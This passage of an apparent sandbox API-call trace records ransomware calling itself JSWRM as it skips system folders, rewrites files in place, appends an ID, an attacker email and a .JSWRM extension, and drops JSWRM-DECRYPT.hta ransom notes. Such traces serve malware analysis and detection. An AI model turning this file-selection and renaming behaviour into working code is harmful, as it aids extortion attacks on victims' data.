lpString2="system volume information") returned -1 [0059.268] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0059.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0059.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0059.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.268] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0059.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0059.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0059.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0059.269] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.269] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0059.269] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0059.269] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0059.269] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0059.269] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0059.269] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0059.269] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0059.269] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0059.269] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0059.269] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0059.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0059.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0059.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0059.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0059.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0059.269] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.269] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=86442) returned 1 [0059.269] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x151a0) returned 0x2471a8 [0059.270] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x151a0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x151a0, lpOverlapped=0x0) returned 1 [0059.317] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.317] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x151a0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x151a0, lpOverlapped=0x0) returned 1 [0059.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.319] CloseHandle (hObject=0x3d4) returned 1 [0059.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0059.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0059.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0059.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0059.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0059.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0059.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0059.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0059.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.321] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0059.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0059.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0059.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0059.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0059.322] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.322] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0059.322] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0059.322] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0059.322] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0059.322] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0059.323] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0059.323] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0059.323] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0059.323] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0059.323] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0059.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0059.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241100, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0059.323] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x2412e0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.323] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0059.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0059.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0059.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0059.323] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.323] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0059.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0059.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.323] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.323] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1040", cAlternateFileName="")) returned 1 [0059.323] lstrcmpiW (lpString1="1040", lpString2=".") returned 1 [0059.324] lstrcmpiW (lpString1="1040", lpString2="..") returned 1 [0059.324] lstrcmpiW (lpString1="1040", lpString2="...") returned 1 [0059.324] lstrcmpiW (lpString1="1040", lpString2="windows") returned -1 [0059.324] lstrcmpiW (lpString1="1040", lpString2="recovery") returned -1 [0059.324] lstrcmpiW (lpString1="1040", lpString2="perflogs") returned -1 [0059.324] lstrcmpiW (lpString1="1040", lpString2="documents and settings") returned -1 [0059.324] lstrcmpiW (lpString1="1040", lpString2="$RECYCLE.BIN") returned 1 [0059.324] lstrcmpiW (lpString1="1040", lpString2="system volume information") returned -1 [0059.324] lstrcmpiW (lpString1="1040", lpString2="msocache") returned -1 [0059.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0059.324] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0059.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0059.324] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1040\\jswrm-decrypt.hta")) returned 0xffffffff [0059.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0059.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0059.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0059.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0059.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0059.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0059.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0059.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0059.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0059.326] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1040\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0059.327] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.327] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0059.330] CloseHandle (hObject=0x450) returned 1 [0059.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0059.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0059.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0059.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226430 [0059.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0059.330] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1040\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1040\\jswrm-decrypt.hta")) returned 0x20 [0059.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226430 | out: hHeap=0x1e0000) returned 1 [0059.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.330] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a04d001, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0059.331] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.331] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a04d001, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0059.331] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.331] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.331] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.331] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0059.331] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0059.331] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0059.331] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0059.331] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0059.331] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0059.331] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0059.331] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0059.331] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0059.331] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0059.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0059.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0059.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0059.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0059.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0059.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.331] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.332] 